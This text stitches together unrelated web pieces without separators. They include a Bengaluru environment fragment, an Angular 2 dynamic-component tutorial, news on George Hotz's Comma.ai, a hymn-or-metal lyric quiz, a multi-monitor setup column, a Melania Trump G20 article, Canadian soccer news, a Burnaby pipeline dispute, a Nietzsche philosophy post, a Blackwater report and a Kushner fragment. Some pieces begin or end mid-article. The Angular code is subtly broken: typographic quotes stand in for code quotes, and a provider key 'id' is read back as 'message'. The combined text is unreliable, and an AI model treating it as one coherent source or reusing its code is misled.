Environmentalist Yellappa Reddy said, “The government is not competent enough to foresee the future implications of the present growth. There is no proper policy on land use and water. Land is being exploited on the whims and fancies of the politicians.”
Bengaluru used to be the most in=demand metropolitan cities for its climate and affordable housing.
A Lake In Bengaluru Is So Full Of Toxic Foam That It Is Now Spilling Into The Streets!
Angular 2 dynamic component loader
poorva vyas Blocked Unblock Follow Mar 29, 2016
In Angular 2, components are the main way we build and specify elements and logic on the page. And we typically load it as a tag in the markup which contains some conditions to make it load dynamic.
But there are cases where we don't know the DOM structure at compile time. In such cases we have to add components on demand in arbitrary locations, hence we use DynamicComponentLoader to load a component dynamically. In these cases we'll be able to instantiate a component and attaching it to a View at a specified location.
DynamicComponentLoader consist of three methods which can be used to load a component into DOM.
loadAsRoot :
It creates an instance of a Component and attaches it to the first element in the DOM that matches the component's selector.
It takes minimum of three argument the first one is component which is to be loaded.The second argument is selector which shows where the component should be loaded into DOM and the third one is injector which is used to instantiate the component.
plunker
@Component({
selector: ‘my-app',
template: `
<button (click)=”form()”>View Form</button>
<div id=”form”>Welcome..! Here form component will be loaded.
</div>
`
})
export class App {
constructor(public dcl:DynamicComponentLoader,
public _injector:Injector) {
}
form(){
this.dcl.loadAsRoot(Form,”#form”,this._injector)
}
}
In the above code ‘form' component is loaded in the div element having id ‘form'. Optionally we can provide onDispose callback which notify when this component instance is destroyed.
It returns a promise as ComponentRef representing the newly created component. One more thing to note about loadAsRoot is that when the component is loaded it will replace the content present in that element i.e. when form component will be loaded the text ‘Welcome..! Here form component will be loaded.' will be replaced by form component.
loadIntoLocation :
It creates an instance of a component and attaches it to a View Container. loadIntoLocation takes at least three arguments, the first is component which will be loaded. Second argument is the targeted Component Instance which is specified via its hostLocation ElementRef. The third one is Template Variable used to specify the location where the component is to be loaded.
plunker
@Component({
selector: ‘my-app',
template: `
<button (click)=”form()”>View Form</button>
<div #form>Welcome..! Here form component will be loaded.</div>
<div>Form will be loaded above this.</div>
`
})
export class App {
public component: any;
constructor(public dcl:DynamicComponentLoader, public _injector:Injector, public _elementRef: ElementRef) {
}
form(){
if(this.component != undefined){
this.component.then((componentRef:ComponentRef) => {
componentRef.dispose();
return componentRef;
});
}
this.component = this.dcl.loadIntoLocation(Form, this._elementRef, “form”);
}
}
Here in the example ‘Form' component will be loaded below the div element having template variable ‘#form'. Unlike loadAsRoot it loads the component by it's selector name in the resulting DOM.
Once a component is loaded it can be destroyed using dispose method. Otherwise every time new instance will be created without destroying previous instances.
loadNextToLocation :
loadNextToLocation method takes minimum of two argument the first is component which is to be loaded and second is elementRef which specifies that the component will be loaded below it.
plunker.
@Component({
selector: ‘my-app',
template: `
<button (click)=”form()”>View Form</button>
<div>Welcome..! Here form component will be loaded.</div>
<div> Form will be loaded below this. </div>
`
})
export class App {
public component: any;
constructor(public dcl:DynamicComponentLoader, public _injector:Injector, public _elementRef: ElementRef) {
}
form(){
if(this.component != undefined){
this.component.then((componentRef:ComponentRef) => {
componentRef.dispose();
return componentRef;
});
}
this.component = this.dcl.loadNextToLocation(Form, this._elementRef);
}
}
In the above example, ‘form' component will be loaded as a tag after the app component specified by ‘elementRef'.
Additionally we can use provider in these methods to send data to the component which is to be loaded dynamically as shown below:
let binding = Injector.resolve([
new Provider(“id”, {useValue: id})
]);
this.dcl.loadIntoLocation(Detail, this._elementRef,"detail", binding);
We can fetch the desired data in Detail Component as :
this.record = _injector.get(‘message');
George Hotz Comma.ai Famous hacker George Hotz said he is still planning to take on Tesla after shutting down his self-driving project following a government warning.
Hotz, the founder of self-driving car startup Comma.ai, was working on a self-driving add-on that could be retrofitted to work on different vehicles. The device, called the Comma One, was set to retail at $999 and ship before the end of 2016.
But Hotz shut down the project in late October after receiving a letter from the National Highway Traffic Safety Administration that asked the startup to provide information to ensure the product's safety or face civil penalties of up to $21,000 a day.
"You know the movie '300?' So you have these 300 Spartans and they are going to go up against the million man Persian Army and if they engaged... they would just be obliterated," Hotz told Business Insider. "And that's kind of what it would be like if I hired lawyers and built out a policy team to try and stand up against NHTSA."
Hotz, who is known for breaking into the original iPhone and Playstation 3, said he is currently talking to OEMs about shipping an aftermarket product based on the Comma One's software that could compete with Tesla.
"Once we want to ship a product we have to deal with regulators, we have to deal with liability, but there are a lot of companies out there that have experience with this," he said. "Instead of us trying to bring this all in-house, we would like to work with a company and help them get this sort of things out to as many people as possible."
The 'Android' of Autopilot
Youtube
Hotz's reaction to the NHTSA letter was questionable to some.
Comma.ai has $3.1 million in funding from Silicon Valley venture capital firm Andreessen Horowitz, so there were experts on hand that could have helped navigate NHTSA' demands.
Hotz had said at TechCrunch Disrupt that the product, that he claimed was "on par" with Tesla Autopilot, was ready to ship by the end of 2016. That led some to wonder whether the Comma One was actually canceled because it wasn't on track to ship by the end of the year.
When asked whether Hotz was ready to deliver the product prior to receiving the letter, he said "it would have been tight."
"So our plan, and I said this at TechCrunch Disrupt, it was never to ship a mass market product before the end of the year," Hotz continued. "But we would have it shipped to a few people [like] early supporters."
A month after shutting down the project, Hotz open sourced the code to the system so researchers could build the hardware themselves.
"Is it finished? No, it's still beta, but the thing we were going to ship was largely going to be beta as well," he said. "I heard, 'Comma AI is the new Theranos.' Really? I've been incredibly open, I've told you everything we are doing, now you can go download our technology on Github."
Hotz said he is currently working on improving the software and has been in talks with OEMs about creating an aftermarket product, but declined to say who he is speaking with.
"Smaller OEMs, particularly Chinese OEMs, seem very excited about what we are doing and about potentially building cars that run on the Comma platform," he said.
When Hotz announced he was cancelling the project, he mentioned that he was in Shenzhen, China. But he said that was just coincidental. "I was just in China, I kind of just put that there," he said.
Hotz said that he still plans on competing directly with Tesla Autopilot by building the Android equivalent of the semi-autonomous system.
"iOS is a walled garden that only runs on one model, just like Autopilot is a walled garden that only runs on one manufacturer's car," he said. "Android on the other hand runs on many different manufacturer's phones. That's where we want to be."
Hotz has an interesting relationship with Tesla CEO Elon Musk. A 2015 Bloomberg profile about Hotz's self-driving car plans mentioned an email between Hotz and Musk. According to Bloomberg, Musk offered Hotz a "multimillion-dollar bonus" to build a product in-house that could replace Mobileye as a supplier.
Following the Bloomberg profile, Musk wrote in a blog post that the article was inaccurate and that Tesla found it "extremely unlikely" Hotz could produce the autonomous driving system.
Hotz has vocally undermined Mobileye in the past. At Tech Crunch Disrupt, Hotz referred to Mobileye as "jokers" for working "with regulators to lower the safety ratings of cars that do not have a Mobileye chip in them." Hotz told Business Insider that he has shorted Mobileye's stock.
Tesla and Mobileye terminated their relationship following a fatal accident while a Tesla was driving in Autopilot. Mobileye said Tesla was "pushing the envelope in terms of safety" following the crash and ensuing break with Tesla.
Competing with Tesla
The Tesla Model 3. Tesla
The self-driving car space is becoming increasingly crowded and that could spell trouble for smaller startups like Comma.ai.
Google announced Tuesday it was spinning out its self-driving car unit, named Waymo, to get its self-driving tech out to the public sooner. The Information's Amir Efrati reported that Google is aiming to use its partnership with Fiat Chrysler to release a line of self-driving taxis by the end of 2017.
Uber, which has self-driving pilot programs in Pittsburgh and San Francisco, is also aiming to launch self-driving cars on its ride-hailing network. Even Tesla has plans to use it autonomous technology in a ride-sharing setting.
Hotz said Comma.ai is banking on the idea that people will still want semi-autonomous tech in their cars before fully self-driving taxis come to fruition.
"Why are these people so uncreative that they keep doing the same business model that only one of them can really succeed at," Hotz said. "If you're trying to build ride-sharing networks, it's not like they can all succeed."
But Tesla, of course, is using its tech outside of a ride-sharing setting. And even automakers like General Motors that plan on using autonomous technology in a ride-sharing setting are still exploring putting it in personal vehicles as well.
Hotz still thinks he can compete on price, though.
"A car is $25,000. Imagine you can buy a $1,000 add-on kit to the car you already have versus buying like a new Model 3 Tesla? It looks like a pretty good value proposition," he said.
Hotz may have a genuine advantage of he can launch a product that can make any car semi-autonomous, regardless of who made it. But he will need help to get there.
"In order to really get this to the masses, and our slogan is ghost riding for the masses, we need partners," he said. "We need to collaborate with people who are good at working with regulators."
Rocks Off recently unearthed a bunch of old hymnals while digging around in our attic, and, coincidentally enough, we also unearthed a box of metal albums we'd meant to mail to the Backstreet Boys several years ago but never got around to it. We put the albums in our rotation and leafed through the hymnals and realized, hey: Thematically, these can be kind of similar. In fact, they can be damn near indistinguishable. See if you can tell which lyrics are from an old-fashioned Christian hymn, and which are from a heavy metal song. If you're stumped - and we don't really blame you; they're a lot closer than anyone has any right to expect - don't worry; we'll post an answer key a little later on today. A. "Now let my people go, land of Goshen/ Go, I will be with thee, bush of fire" B. "Signs of endings all around us/ Darkness, death, and winter days/ Shroud our lives in fear and sadness/ Numbing mouths that long to praise" C. "O sacred head, sore wounded/ Defiled and put to scorn/ O kingly head surrounded/ With mocking crown of thorn" D. "God give me the answer to my life/ God give me the answer to my dreams/ God give me the answer to my prayers/ God give me the answer to my being" E. "And still they come, new preys of plague/ While often in their rooms of prayer/ God's people worship, safe and sound/ Unheeding, even unaware" F. "In His purpose I will stand/ I've been renewed by the Maker/ In His purpose I will stand/ I've been renewed by Him alone" G. "Tombstones are bursting, poor sinner stands a-trembling/ The trumpet sounds within my soul, I ain't got long to stay here" H. "O Lord, here is thy offertory/ Here is thy glory sown/ Here is the hunting ground/ Here is thy rightful throne" I. "Voices of victory all shout and proclaim/ The Kingdom of Glory is mine/ The raise of the will, our prophecy filled" J. "Yet nations still prey on the meek of the world/ And conflict turns parent from child/ Your people despoil all the sweetness of Earth/ The briar and the thorn grow wild" K. "Could it be you're afraid of what your friends might say/ If they knew you believe in God above?/ They should realize before they criticize/ That God is the only way to love" L. "Break new ground of a new frontier/ New ideas will surely get by/ No deed or dividend, some may ask why/ You'll find the solution, the answers in the sky" M. "Human sin your plan has twisted/ Human wills defy your own/ All the world reverts to chaos/ Rule and judge as God alone" N. "Raise me from mortal/ My will be your will/ My words speak your words/ Your pains raise me to bliss" O. "O life whose crushing was for love/ O love whose spending was to death/ O death, your mourning is our seed/ A seed for wheat, our bread and life" P. "Save me, don't let me fall/ Heaven sent, I heard the call/ Stop me, don't let me go/ Touch my heart, then let me know" Q. "Yet to the end the song went on/ A supper's parting hymn/ A psalm intoned on dying lips/ When sun and hope grew dim" R. "If mercy's abandoned by those who'd be brave/ Economy squandered by those who'd be generous/ Humility slighted by those who would lead/ This is sure death" S. "I know my robe's gonna fit me well/ I'm gonna lay down my heavy load/ I tried it on at the gates of Hell/ I'm gonna lay down my heavy load" T. "Should I feel lost somehow/ Do I feel less than thou/ Could I be less undone/ Could I fall deeper down" U. "O world invisible, we can touch thee/ O world intangible, we can touch thee" V. "I lay in dust, life's glory dead/ And from the ground there blossoms red/ Life that shall endless be" W. "Light of my sun, light in this temple/ Light in my truth, lies in the darkness"
Listen to this concession: “Okay, yes, once you've used a two-monitor setup, going back to a single monitor sucks.”
That from my wife who last year resisted using a second monitor. It's so darn quaint when she admits she's wrong.
Judy found that out when I brought home a friend's PC for repair, needed a monitor, and borrowed hers. (First rule of computing: Use someone else's equipment whenever possible.)
The repair was taking longer than I expected — funny how computers do that to you — and, my pobrecita was feeling deprived.
Two Monitors in Every Office
I added a second monitor years ago and it was sweller than swell. Click a link in an e-mail on the right monitor and watch it appear in the browser on the left monitor. Besides watching my productivity increase (I say that for you business types), it felt wildly cool seeing two screens at once.
If you didn't realize, I like cool things.
But my gut said, “If two's good, three's got to be better.” It is.
That's because with three, I'm on the middle screen, writing in Word, doing research in a browser on another screen, and trying out the app I'm reviewing in on the third window. Or if Judy's not around, watching a movie.
Once you get used to spending money for the equipment, believe me, adding a second, third, or even fourth screen isn't difficult.
Okay, that's the setup. Here's how to do it.
The Nuts, Bolts, and Details
In less time than it takes for your system to boot up, you can install a second or third monitor. (Actually, you can string together as many as six of them; more in a sec.)
Most PCs have video adapters — either built into the motherboard, or a separate video adapter add-in card — and have two monitor ports. The ports are generally two DVI or VGA connectors, or maybe one of each. (Of course, if you're on the forefront of technology, you probably have the even better HDMI; I'm jealous.)
So adding a second monitor is straightforward: Turn off your PC, connect the cable that comes with the monitor to the second port on the video adapter, and boot. XP and Win 7 will spot the new monitor and talk you through the setup steps. Microsoft has a tutorial that explains how it works.
But I'm thinking that many of you don't want to crawl under the desk with all the dust and schmutz to find the second video adapter port. So I have an alternative, a nifty one, too.
All you need is a spare USB port and StarTech.com's Professional High Resolution USB DVI External Dual or Multi Monitor Video Adapter (USB2DVIPRO). You can use it to save crawling under the desk to attach a second monitor. And like me, you can have a third monitor without the struggle of opening your computer's case to add a another internal video adapter.
Installing the StarTech device is a five-minute operation. Install the drivers, attach the monitor's cable into the gizmo, plug it into a USB port, and you're in business. (Okay, yes, if your only free USB port is on the back of the computer, you'll need to wiggle your way to its location.)
The USB2DVIPRO device is rated for a super-high 1920 x 1200 resolution. Amazon sells it for under $100.
StarTech has a another model, the USB2DVIE2, that's rated for 1680 x 1050 resolution, more than adequate for most of us, and it sells for about $50 on Amazon.
If you have extra USB ports–and extra moolah–you can connect up to four StarTech adapters on your PC. With the two connected to your PC's video adapter, you can act like a super day trader with six monitors.
Sure, you're saying, the image must be lousy and the display refresh rate–if it refreshes–will be slower than a ‘386 booting Windows 3.1.
Wrong and wrong. It's like plugging directly into your PC's video adapter. And if I didn't know, I couldn't tell which monitor was attached to the StarTech.
No, I didn't test it with a notebook or 64-bit operating system, and I don't own a memory- or graphic-intensive video game, so I don't have those answers for you. But I was fine with the refresh and images and resolution for the dozens of apps I run, online games, and for playing videos.
You Need Software, Too
You can manage multiple monitors using just the native features in Windows XP and 7. But Microsoft gives you bare-bones functionality.
For instance, if you move an application from one monitor to the other, the window won't necessary fit perfectly and you'll have to fiddle with adjusting the size. I prefer having a Taskbar on each monitor showing active apps; you might prefer a Taskbar on one monitor showing all the running apps. The software built into Windows doesn't offer these options.
Some video adapters–most notably from ATI and Nvidia–come with multi-monitor software tools, and there are free and low-cost third-party tools that add even more functionality to multi-display setups. Zbar, for instance, is a freebie that lets you manage the taskbar across monitors. And if your iPad isn't busy, you can use the $10 MaxiVista to turn it into a second monitor.
My love, though, is UltraMon. It's $40, but you can download a 30-day free trial. Among its many valuable features, UltraMon gives you features you can't get using Windows' native dual-monitor support. For instance:
A Smart Taskbar that gives you separate taskbars on each monitor
Hotkey shortcuts for maximizing, moving, and repositioning apps
UltraMon shortcuts that load favorite apps on boot and move the application display to a specific monitor
An icon in the menu bar of an app that lets you quickly move that window to the other monitor
It's also great for spreadsheet users: One click maximizes the spreadsheet across all your monitors so you don't have to touch the scrollbars.
UltraMon works in all versions of Windows, including 64-bit versions, and supports multi-display systems. The author put together a valuable FAQ dealing with generic multi-monitor problems, and the company's forum is well maintained.
Okay, you've got the idea. Now head for Amazon or Costco and buy the cheapest monitor you can find. Even a small 15-incher will do. Hook it up to your PC–and feel that coolness.
[This post is excerpted from Steve's TechBite newsletter. If you liked it, head here to sign up–it's delivered on Wednesdays to your inbox, and it's free.]
Read more:
Advertisement
Melania Trump stunned in an eye-catching, red ensemble during her arrival to the town hall spouses program at the G20 summit on Saturday as her popularity soars in the US.
The First Lady showed off her bold style in a grey floral dress with a red coat draped over her shoulders.
Her elegant look was completed with a wide red belt and grey pumps. Melania was greeted by Hamburg's Mayor Olaf Scholz as she arrived for the spouses program.
Melania, whose favorable ratings have climbed in the past few months, took a few mintues to chat with Canadian Prime Minister, Justin Trudeau's wife, Sophie Gregoire Trudeau, during the event.
She was also seen mingling with other first spouses as the mayor spoke throughout the program.
According to a new Fox News poll, the First Lady isn't just impressing US citizens with her elegant and bold style.
Scroll down for video
Melania Trump stunned in an eye-catching, red ensemble as she arrived to the town hall spouses program at the G20 summit on Saturday. The First Lady showed off her bold style in a grey floral dress with a red coat draped over her shoulders
Her elegant look was completed with a wide red belt and grey pumps. Melania was greeted by Hamburg's Mayor Olaf Scholz (right) as she arrived for the spouses program
The First Lady kept a smile on her face as she prepared to meet and greet other first spouses. She's pictured with Mayor Olaf Scholz ahead of the program
First Lady Melania made a grand entrance at Hamburg's city hall as she walked ahead of the first spouses while chatting with Argentina's First Lady Juliana Awada (center)
Fifty-one per cent of voters now view her favorably. That's a 14-point jump from December and up 16 points from the first Fox News poll last summer.
At that time, only 35 per cent of voters viewed the wife of the now-President Donald Trump favorably and 40 per cent unfavorably. Twenty-four per cent couldn't rate her.
According to the poll, 28 per cent of voters views her negatively; however, she still falls short of her predecessor Michelle Obama, who had a record high 73 per cent of voters viewing her favorable during her husband's presidency.
Melania's husband are also up by a few percentage points with 47 per cent of voters viewing him favorably.
In March, the US president's favorable percentage was 44 and 38 per cent just before November's election.
On Friday, the First Lady had a hectic day after being trapped inside her hotel by violent rioters.
The protesters delayed her appearance at the G20 summit, but she still made a grand entrance in a dove white, frilled dress.
Sporting the shoulder-cut dress that was complimented with white stilettos, the former model wore a simple look and seemed to not be phased by the riots.
Earlier, she tweeted support to those hurt by the firebombing rioters in Germany that has left her trapped inside her hotel room.
'Thinking of those hurt in #Hamburg protests. Hope everyone stays safe! #G20,' she tweeted.
Her husband retweeted her message after his convoy was forced to take a lengthy detour around the violence.
Melania remained in her hotel room until it was safe as other leaders arrived to the G20.
Other spouses including Theresa May's husband Philip and French president Emmanuel Macron's wife Brigette were also told to stay indoors.
She took a few mintues to chate with Canadian Prime Minister, Justin Trudeau's wife, Sophie Gregoire Trudeau, during the event
She was also seen mingling with other first spouses as the mayor spoke throughout the program
On Friday, the First Lady, whose favorable ratings have climbed in the past few months, had a hectic day after being trapped inside her hotel by violent rioters. She's pictured among other partners of G20 participants
Melania finally arrived to the G20 summit with her husband after being trapped inside her hotel by violent rioters on Friday
Wearing a dove white frilled shoulder-cut dress, the FLOTUS stood next to her husband who sported a striped navy blue and white tie with his suit
'Thinking of those hurt in #Hamburg protests. Hope everyone stays safe! #G20,' she tweeted before arriving to the summit
Police called reinforcements after tens of thousands of protesters descended on Hamburg, causing chaos for the G20 summit
A man is carried away by police as officers in riot gear clear protesters from the road ahead of the G20 summit involving world leaders in Germany today
When Melania finally made it to the G20 summit on Friday, her first task was to cut the much-anticipated meeting between her husband and Russian President Vladimir Putin short.
Secretary of State Rex Tillerson said officials sent the first lady in to close the meeting after it ran more than an hour but she failed ultimately, letting the meeting go on for more than another hour.
'Several times I had to remind the president, people were sticking their heads in the door.
'They even sent in the first lady at one point to see if she could get us out of there, and that didn't work either. We went another hour after she came in to see us, so clearly, she failed.'
She is then meet with Putin just moments after he completed a two hour and 16 minute with Trump.
The 5-foot-11-inch former model towered over a 5-foot-six-inch Putin as they greeted each other with a warm smile.
She later sat next to Putin at dinner and Argentinia's President Mauricio Macri, and her husband was no where in sight.
Melania would then go on and greet other notables - including French first lady Brigette Macron - before posing in a photo with all the political leaders and their spouses.
Trump's face-to-face meeting with Putin was quickly followed by news the US and Russia had reached an agreement on a cease fire in Syria.
The sign of possible progress in Syria – where Russia is the primary backer of Syrian President Bashar al-Assad – came hours after Trump said it was 'an honor' to meet Putin.
On Thursday, Trump warned that the future of Western civilization is at stake and the West must decide if it has the 'will to survive'.
When Melania finally made it to the G20 summit on Friday, her first task was to cut the much-anticipated meeting between her husband and Russian President Vladimir Putin short. A task that she apparently failed to complete, according to Secretary of State Rex Tillerson. But after the two hour meeting between Putin and Trump, Melania finally met the Russian president
The 5-foot-11-inch former model towered over a 5-foot-six-inch Putin as they greeted each other with a warm smile
Melania then went on to greet other notables, including French first lady Brigette Macron
She also posed for a photo with all the political leaders (second row center with Trump) and their spouses before the leaders met for more talks
At the start of a four-day trip to Europe, the US President said the lack of a collective resolve could doom an alliance that endured through the Cold War.
In a speech in Warsaw – ahead of the G20 meeting in Hamburg – he lashed out at hostile forces, ranging from Islamic terrorism to Russia.
Praising Poland for its resilience in the face of historic threats from Nazi Germany and the Soviet Union, he declared: 'Let us all fight like Poles.'
Trump was given a very warm welcome, the crowd cheering and chanting his name. Many were said to have been bussed in to ensure his reception was big and noisy.
She later sat next to Putin at dinner and Argentinia's President Mauricio Macri, and her husband was no where in sight
Marcel de Jong could earn his 50th cap for Canada this weekend when the Canadian men play Bermuda in a friendly.
The 30-year-old defender-midfielder from the Vancouver Whitecaps is one of 18 players selected by interim Canadian coach Michael Findlay from a 27-man camp roster in Florida to travel to Bermuda.
"That is an absolutely outstanding international career," Findlay said. "He's been a great servant for our country and our program. Marcel has provided a strong leadership example within this environment here and has been contributing both on the field and off the field in terms of what we're asking of him."
Story continues below advertisement
De Jong made his senior debut for Canada in November 2007 in a 0-0 tie with South Africa in Durban. He has played under six Canadian coaches: Dale Mitchell, Stephen Hart, Tony Fonseca, Colin Miller, Benito Floro and Findlay.
De Jong was born in Newmarket, Ont., to Dutch parents but moved to the Netherlands when he was four. He spent some time in the Dutch national youth system before pulling on a Canadian under-17 shirt when his after his mother contacted Canada Soccer officials to let them know he had dual citizenship.
He went on to play club soccer in the Netherlands and Germany before returning to North America.
Canada, ranked No. 120 in the world, takes on No. 186 Bermuda on Sunday at the Bermuda National Sports Centre. It's the Canadian men's lowest ranking since 2014 when they were ranked 122nd.
Canada has never lost to Bermuda, winning four and drawing four since their first meeting in 1968. Canada won 3-0 the last time they met in March 2007 thanks to goals by Atiba Hutchinson, Tomasz Radzinski and Paul Stalteri.
Findlay's camp roster was drawn from North American players.
The Bermuda game roster features 10 MLS players: three each from Toronto FC (Jay Chapman, Jonathan Osorio and Tosaint Ricketts) and the Vancouver Whitecaps (de Jong, Marcos Bustos and Ben McKendry) and two from the Montreal Impact (Wandrille Lefevre and Anthony Jackson-Hamel) plus Orlando's Will Johnson and FC Dallas's Tesho Akindele.
Story continues below advertisement
Story continues below advertisement
Goalkeeper Sean Melvin is from the Whitecaps 2.
Ben Fisk (FC Edmonton), Callum Irving (Ottawa Fury) and Nana Attakora (San Francisco Deltas) come from the NASL. There are four unattached players: Kyle Bekker, Dejan Jakovic, Adam Straith and Maxim Tissot.
Chapman, Fisk, Irving, McKendry and Melvin could earn their first cap Sunday.
The Canadian Soccer Association said Carl Haworth and Nik Ledgerwood, part of the Florida camp roster, were unavailable for the Bermuda game through injury. An injury prevented Vancouver's Russell Teibert from attending the Florida camp.
MAP: Kinder Morgan's proposed pipeline route section between Burnaby and Langley
The City of Burnaby, B.C., is coming out swinging at plans to twin the Trans Mountain Pipeline, saying Kinder Morgan's expansion plan lacks critical details, including a safety plan and a clear route through the city.
Greg McDade, the city's legal counsel, has sent a letter to the National Energy Board, which is reviewing the project, asking for the application to be rejected.
The pipeline company has applied for approval to triple the capacity of the 60-year-old pipeline, which carries crude oil from Alberta, under the City of Burnaby and several other Lower Mainland municipalities, to a tanker terminal on the shore of Burrard Inlet.
McDade says one major concern is the $5-billion expansion plan doesn't address major safety issues.
"What would happen in the event of a fire? What would happen in the event of a leak? There seems to be a suggestion that the City of Burnaby and its fire department and police department can take care of all those things."
No details about new route
McDade also says people have been misled to believe that the pipeline will follow the existing route, but that is not the case.
"There is a very strong misconception out there because Kinder Morgan keeps telling the public that they're going along the right of way."
"But in Burnaby that's not true. Less than ten percent of the right of way they propose for the new pipeline in Burnaby is going along the existing route. The other 90 percent is new."
McDade notes it's very unclear where the new sections of pipeline will go and the city needs more details.
"There are two choices, and they call them study corridors. But in a major city a little more precision is absolutely required," he said.
"It seems they are not sure how and where they're going to go, and that makes it impossible for Burnaby to really respond to this."
Public mislead about safety record, says mayor
Mayor Derek Corrigan said the company has also misled the public on their safety record.
"They're telling our citizens that they have operated the pipeline safely for 60 years, in spite of the fact that there has been more than one spill in Burnaby -- the most recent of which, in 2007, devastated a Burnaby neighbourhood and damaged Burrard Inlet habitat with a mere 1,500 barrels of oil," said Corrigan.
"We do not ever want to have to deal with the consequences of the kind of spill this new pipeline and the new storage tanks could cause.”
In 2007 an excavator working on a sewage line pierced a pipeline, releasing more than 250,000 litres of crude oil. About 70,000 litres flowed into Burrard Inlet, sparking a $15-million cleanup.
Two contractors and Trans Mountain Pipeline, eventually plead guilty to a 21-count indictment in B.C. Provincial Court.
(1) Nothing is red in itself.
(2) Nothing is delicious in itself.
(3) Nothing is malodorous in itself.
(4) Nothing is loud in itself.
(5) Nothing is painful in itself.
(6) Nothing is poisonous in itself.
(7) Nothing is healthy in itself.
(8) Nothing is fast in itself.
Examples (1) through (5) are of course cases of so-called secondary qualities -- those properties or "powers" in an object that elicit particular sensory experiences in particular classes of observers. So, for example, apples are "red" because (a) they differentially reflect light within the wavelength range of 625–740 nm, which (b) causes in organisms outfitted with long cone photoreceptors the sensory experience of seeing red. To be sure, it is by dint of the apple's physical structure that they appear red to us. But apples aren't red in themselves, because organisms with visual systems sensitive to different classes of wavelengths than we are (e.g., bees) will perceive apples as being a different color than we do (e.g., "bee purple"). Thus, red is a secondary quality.
Examples (6) through (8), though not usually falling under the standard idea of 'secondary quality', are analogous enough. (For example, hydrogen sulfide is poisonous to humans, but salubrious to Thiomargarita namibiensis.) So at least for now, let's count them too among the secondary qualities.
It is common to hear secondary qualities described as "subjective." [1] There's probably no harm in this, as long as we keep in mind that the kind of "subjectivity" that characterizes secondary qualities is consistent with their being objective. It is true that the redness of the apple can adequately be conceived only by reference to some or other subjective state. But this is not to say that whether, say, I perceive an apple as being red is merely a matter of my "subjective opinion," or of my desire to see it as being red (as opposed to blue, green or turquoise). Rather, the apple and my visual system are objectively constituted such that under the right conditions, I will ineluctably see the apple as red. The property red, then, is at least in that sense an objectively real feature or constituent of the world. Thus, the fact that some property φ falls under (I) cannot motivate antirealism about φ.
Now consider the analogous claim about value:
(V) Nothing is valuable in itself (or has value in itself).
For various reasons, the fact that Nietzsche expresses views along the lines of (V) [2] has been taken by many of the leading commentators (I have Hussain, [3] Leiter [4] and Clark-Dudrick [5] in mind) to be evidence of Nietzsche's antirealism about value. Granted, this inference is never the sole, or even the main, reason given for the antirealist reading advocated. Nonetheless, for each of these authors, it does play a conspicuous, active role in making the cumulative case. And this reliance seems to be mistaken, because the fact that nothing has a given property φ "in itself" says nothing about whether φ is in some sense real or objective. [6]
_______________________________
NOTES
1. For instance, the Wikipedia article on the primary/secondary quality distinction states that "[p]rimary qualities are measurable aspects of physical reality," while "[s]econdary qualities are subjective." (Visited December 2, 2008.)
And since I'm bringing up secondary qualities, I might as well note that it is not my intention here to argue that Nietzsche believes value is akin to a Lockean secondary quality. I'm only suggesting that the "in itself" locution and its ilk give us no reason to deny that he at least might.
2. “Whatever has value in our world now does not have value in itself, according to its nature — nature is always value-less, but has been given value at some time.” (GS 301)
3. “Honest Illusion: Valuing for Nietzsche's Free Spirits,” in Leiter and Sinhababu (eds), Nietzsche and Morality, New York: Oxford University Press (2007)
4. Nietzsche on Morality, London: Routledge (2002), particularly at 146-147.
5. Clark, M. and Dudrick, D., "Nietzsche and Moral Objectivity," in Leiter and Sinhababu (eds), Nietzsche and Morality, New York: Oxford University Press (2007).
6. Or alternatively that talk about φ is true or justified. There is a bit of a muddle here that I'm glossing over, in that I would count as "realist" even those of the "Privilege" readings Leiter construes as nonrealist. See "Nietzsche's Metaethics: Against the Privilege Readings," European Journal of Philosophy 8: 277-297, at 279. The only issue I'm concerned with is whether or not, as Leiter puts it, "Nietzsche [takes himself to be] doing anything more than giving his idiosyncratic opinion from his idiosyncratic evaluative perspective...." (277) I'd say it's enough to count Nietzsche as a "realist" to show that he does believe that as a matter of fact his evaluative perspective ought to be privileged over at least some others. Whether the truth or justification of this presumption would turn on the objective existence of "value" in the world, as opposed, say, to certain objective "norms of good judging" that flow from a commitment to "just" evaluation (Clark-Dudrick 220-223), seems secondary.
A state department investigator warned that the private security firm Blackwater considered itself above the law, just weeks before Blackwater guards shot and killed 17 Iraqi civilians, it has been reported.
According to the New York Times, Jean Richter, who was sent to Iraq to review Blackwater's operations, warned in a memo dated 31 August 2007 that little oversight of the company, which had a $1bn contract to protect US diplomats, had created "an environment full of liability and negligence".
Blackwater guards "saw themselves as above the law", Richter wrote in the memo. His inquiry was abandoned after Blackwater's top manager said he could kill the government's chief investigator and no one could or would do anything about it as it was in Iraq. The threat came from Daniel Carroll, Blackwater's project manager in Iraq, during a meeting with Richter and another state department official, Donald Thomas, to discuss the review, which had uncovered overbilling and complaints about a cafeteria in Blackwater's compound.
Richter wrote: "I took Mr Carroll's threat seriously. We were in a combat zone where things can happen quite unexpectedly, especially when issues involve potentially negative impacts on a lucrative security contract."
US embassy officials in Baghdad sided with Blackwater rather than the state department investigators as tension escalated between Richter and Blackwater in August 2007, the Times reported on Monday. The officials told the investigators they had disrupted the embassy's relationship with the security contractor and asked them to leave. Once back in Washington, Richter wrote his 31 August memo to state department officials to warn of lax oversight of the company.
The state department has not commented on the aborted investigation. A spokesman for Erik Prince, the founder and former chief executive of Blackwater, who sold the company in 2010, told the Times that Prince had never been told about the matter. Blackwater was renamed Xe Services in 2009. After Prince sold the company, the new owners named it Academi. In early June, it merged with Triple Canopy, one of its rivals for government and commercial contracts to provide private security. The new firm is called Constellis Holdings.
On 16 September 2007, Blackwater guards shot and killed 17 Iraqis at Nisour Square. A nine-year-old boy was among the civilians killed. Federal prosecutors later said Blackwater personnel had shot indiscriminately with automatic weapons and heavy machine guns, and had used grenade launchers. Four Blackwater guards involved in the shooting are on trial in Washington, the government's second attempt to prosecute the case in a US court after previous charges against five guards were dismissed in 2009.
The shooting soured relations between the US and Iraq, contributing to Baghdad's refusal the next year to agree to a treaty allowing US troops to stay in the country beyond 2011. The absence of a deal haunts the Obama administration to this day. Critics cite the lack of a US troop presence as a factor behind the military success of the jihadist militants of Isis.
But what is also peculiar is the level of trust Kushner would have been placing in Russian officials in asking for such a communications channel. Foreign affairs are often complex, yet Kushner didn't want the U.S. government's help—or supervision.
"What is unusual and borderline disturbing about this is less that it cut out the State Department or cut out the intelligence community; I think there is a precedent for both of those things in back-channels," said Jon Finer, former State Department chief of staff under John Kerry. “It shows a level of trust in Russian intelligence, and Russian diplomatic personnel beyond the level of trust afforded to American intelligence and American personnel.”
